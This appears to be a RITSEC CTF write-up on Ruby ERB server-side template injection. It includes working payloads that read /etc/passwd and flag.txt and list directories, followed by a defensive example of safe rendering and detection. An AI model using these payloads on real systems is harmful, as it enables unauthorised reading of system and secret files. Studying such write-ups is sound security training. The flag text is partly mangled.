Crazy Train [Web – 250 Points] - RITSEC CTF

Challenge Description

fun.ritsec.club:3000

Author: hulto

I tried many different vulnerability tests on this challenge, but they did not work. I noticed there is a hidden value, article[a]. I tried the input aaaaaaaaaaaaa and it did not work, but when I entered the number 111111 it worked.

So I tried arithmetic calculations.

2 + 4 # does not work

2 * 4 # works

5 / 2 # works

After searching Google, I found it is Server Side Template Injection, but there are many possible languages: Ruby, Python, PHP, Java.

A useful link:

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20injections

I found this link and read it.

https://www.trustedsec.com/2017/09/rubyerb-template-injection/

To read /etc/passwd

<%= File.open('/etc/passwd').read %>

Yeah! It works.

OK. Time to read flag.txt

<%= File.open('flag.txt').read %>

The flag is

RITSEC{[email protected]_bad_idea}

 

Note: There is a nice trick to search the directory. Credit to Aj Dumanhug.

<%= Dir.entries('.') %>
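For the defensive side, here is an added example (not the challenge's code, which the write-up does not show) of why ERB evaluates the input and how to render it safely. It assumes the server builds the ERB source from user input; the function names render_vulnerable, render_safe and erb_tag? are hypothetical.

```ruby
require 'erb'

# Vulnerable pattern (assumed): user input is concatenated into the ERB
# source, so any <%= ... %> tag in it is executed as Ruby on the server.
def render_vulnerable(user_input)
  ERB.new("<p>#{user_input}</p>").result(binding)
end

# Hardened pattern: the template source is a constant. User input enters
# only as a value and is HTML-escaped on output; it is never compiled.
SAFE_TEMPLATE = ERB.new('<p><%= ERB::Util.html_escape(text) %></p>')

def render_safe(user_input)
  SAFE_TEMPLATE.result_with_hash(text: user_input)
end

# Simple detection check for request logs: ERB tag delimiters in a field
# that should only carry plain text.
def erb_tag?(user_input)
  user_input.match?(/<%.*?%>/m)
end

# Constructed sample inputs: the plain number from the write-up and its
# arithmetic test wrapped in an ERB output tag.
SAMPLES = ['111111', '<%= 2 * 4 %>'].freeze

if __FILE__ == $PROGRAM_NAME
  SAMPLES.each do |input|
    puts "input:      #{input}"
    puts "vulnerable: #{render_vulnerable(input)}"  # tag is evaluated
    puts "safe:       #{render_safe(input)}"        # tag is shown as text
    puts "flagged:    #{erb_tag?(input)}"
    puts
  end
end
```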

Thanks for reading.